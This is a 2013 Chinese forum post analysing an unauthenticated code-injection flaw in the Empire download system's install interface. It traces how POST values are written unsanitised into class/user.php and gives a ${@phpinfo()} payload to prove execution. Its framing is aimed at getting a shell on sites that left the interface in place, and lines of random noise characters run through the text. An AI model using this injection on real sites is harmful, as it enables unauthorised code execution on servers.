这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
( \; E; U/ u: r9 L
0 e* A9 M" {4 b' |) d! Q3 I/ |5 O$ F/ ?( x- u7 R
这是帝国的一套下载系统 如图- ]! c* [: x! ~( b$ N
ps(不需要任何账户和密码,直接写shell)
2 y) u; a' I! x0 u6 I2 o由于很多站是由于下载要整合discuz 等等一些论坛....
! u. ~2 J- v3 ?8 S6 _
- a; i- j, @% L9 r9 [6 k4 k8 ^而帝国他又有一个万能接口,如图 # g3 L8 [ D8 V8 V! a
4 m( z; n: E4 Z( ?( K! a
& I: n0 @6 G D# H s1 L- z而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
( t- y/ T' t- p' O6 T5 `3 [% A% f' @+ U6 V4 B
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
* }' J+ m: t2 V2 a! t0 k
6 r; c' ?% Q' ]6 G3 T- N$ t$ [7 b在data/fun.php中的15行6 ?7 f6 q5 O* J5 a4 k; u
: g2 \% H- ~- [2 K
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {
% l5 W4 P2 P- v17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干/ V6 S/ U- i+ Z/ v
7 A0 d" }0 r8 Y: e
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);& x/ r3 p' @" J
+ }; {/ ~/ d$ Y. O1 G7 E. R他将传进来的变量进行了切割,然后赋给了$filetext
. }9 d) {" U! }- a8 i) f
$ M4 a% ~8 J0 V然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
- ?+ c* q8 P: |8 |3 d
! b4 {/ t1 R& V9 T3 Y% y/ J% E! L我们看看写入的结果,随便填一个
D3 Z, I' e" ^1 L# T7 b) [8 Y- R# V8 b* w# K! x9 ~" }
9 J$ ?" Y! C/ j1 x4 Q2 k
' Z( t" C0 v( Y4 z
. P$ P3 @+ x: m$ }9 j! W: k$ J/ Q4 P8 {
; r5 {3 [1 j2 l! S. F8 F' Z* a
8 D- o: A" y( M6 V8 l" x1 U
7 z3 R/ R& D8 I7 }" B; {
' r% I; l1 d$ [3 B) {% `5 _8 s! w3 C. @' `, C
7 t+ s: o! e% h8 U* t, V2 I
; U, @$ e8 i2 j# c$ M
: C5 C. O0 }- J' _
, L9 G2 @, g4 k) U& Q
9 Q0 \" Q0 Z* r0 A+ B% W5 J- w0 ^2 F
0 u; q; P6 Q' A" i+ N0 r6 C: v5 y
+ I% F: g' X# ~6 U. ~* f: h) |9 l) L, T# s
4 b3 j8 _% ?- R" _2 @( u
6 v7 j* `7 a$ B0 \; W: k# e' x" [所以我们淫荡点,写个${@phpinfo()}试试
! Q% B. n+ f0 g; I然后访问以下class/user.php这个文件
; D2 \: h+ _) q' K0 W5 h. e5 @日了吧 ) ?. B- H8 b% |6 c j q
0 l) |/ P+ x- c7 E8 \; {! V
+ B& k9 T) ?4 g* ~7 Y1 Q/ V
( k' N- x3 q6 Q. d' ]
& V! {+ S- G6 f# z" [7 u9 Q3 t5 I/ z
| 
发表于 2013-1-23 09:34:37
收藏
支持
反对